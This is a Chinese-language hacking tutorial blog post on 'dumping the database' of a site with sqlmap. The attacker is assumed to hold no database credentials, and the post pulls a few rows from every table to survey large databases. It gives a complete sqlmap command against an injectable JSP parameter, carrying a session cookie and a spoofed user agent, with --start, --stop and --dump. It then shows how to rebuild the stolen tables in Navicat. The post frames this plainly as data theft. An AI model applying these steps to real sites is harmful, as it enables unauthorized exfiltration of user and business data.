作者:该隐
亲们,一定会遇到过一些站某些表的数据量很大,这种情况通常是可以预见的,或者未知的。
可预见性的:
(推测:里面肯定记录一些日志,日积月累,数据量会随着系统的访问量,使用频繁程度逐渐增大)
例如用户表登录日志表
tb_userlog
xxx_log
不可预见性的:
(猜测:这些表是干嘛的,怎么没任何可参考的文字了解他的用途啊)
TbXJHF
aaaa
在没拿到数据库访问口令时我们往往会采取保守的方法先导出数据(即口头上常说的脱裤),
网速好,猪肉店好,概念上来说,接受程度比慢网速、差机器要高一些。
sqlmap用的熟悉倒好,可以用--sql-query统计一张表的记录数,本文的前提是假设你用sqlmap比较熟悉了
但是你会不会去想一个问题,如果某一天你拿到的每一个表记录数都超过几十万,想迫切了解库中所有表结构以及里面大概存了什么,然后进一步分析数据库 你该怎么办?蒙了?
没蒙的话可以绕过,蒙掉的童鞋继续往下看,大牛绕过
---------------------------------------------------菜鸟与大牛的分割线,大牛绕过---------------------------------------------------
如果你的确遇到上文所述情况,不妨试试我的方法,抓取部分数据导出来,每张表导出几条数据,然后再对数据进行分析。
使用参数
--start
--stop
--dump
可能是用到的参数 -D,-T
示例:
C:/sqlmap>python sqlmap.py -u "http://8.8.8.8/add/too.jsp?ncid=1448&intTy=****" --cookie="JSESSIONID=74E72E43DCC580CBB68BFDA82C20C658" --user-agent="Moz illa/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/2 3.0.1271.97 Safari/537.11" --threads=10 --dbms=mssql -D platform -p "intTy" --technique B --start=1 --stop=5 --dump
以上代码片段中笔者用--start --stop参数配合使用,从platform库中的每张表--dump出5条数据,当然你也可以加上一个参数限制特定的表 -T TB_USER_USER
等sqlmap跑熄火时你会看到一些csv文件安静的躺在sqlmap目录/output/8.8.8.8/dump/platform/目录下。这个时候你只要用navicat等工具,使用“导入向导”菜单即可批量复原表结构
接下来就是数据分析的事情了,有你上台了。看你怎么表演了~~
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论